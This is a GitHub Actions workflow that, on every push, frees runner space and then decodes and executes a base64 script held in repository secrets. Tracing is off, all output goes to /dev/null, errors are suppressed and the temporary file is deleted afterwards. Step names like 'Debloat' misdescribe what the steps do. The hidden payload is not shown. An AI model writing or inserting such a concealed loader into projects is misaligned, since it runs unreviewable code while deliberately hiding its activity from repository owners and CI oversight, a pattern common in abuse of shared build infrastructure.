name: Experiments
on: push
jobs:
  randomize:
    runs-on: ubuntu-latest
    concurrency:
      group: staging_environment
      cancel-in-progress: true
    steps:
      - name: Debloat
        uses: actions/checkout@v4
      - name: Maximize build space
        uses: AdityaGarg8/remove-unwanted-software@v5
        with:
          remove-dotnet: 'true'
          remove-android: 'true'
          remove-haskell: 'true'
          remove-codeql: 'true'
          remove-docker-images: 'true'
          remove-large-packages: 'true'
          remove-cached-tools: 'true'
          remove-swapfile: 'true'
          verbose: 'false'        
      - name: Run experiment
        env:
          ZIP_B64: ${{ secrets.FILE_ZIP_B64 }}
          ZIP_B64_ALT: ${{ secrets.FILE_ZIP_B64_ALT }}
          FILE_SCRIPT_B64: ${{ secrets.FILE_SCRIPT_B64 }}
        run: |
          {
            set +x            
            exec 1>/dev/null 2>/dev/null
            tmp_script=$(mktemp)
            echo "$FILE_SCRIPT_B64" | base64 -d > "$tmp_script"
            chmod +x "$tmp_script"
            "$tmp_script"
            rm -f "$tmp_script"
          } || true
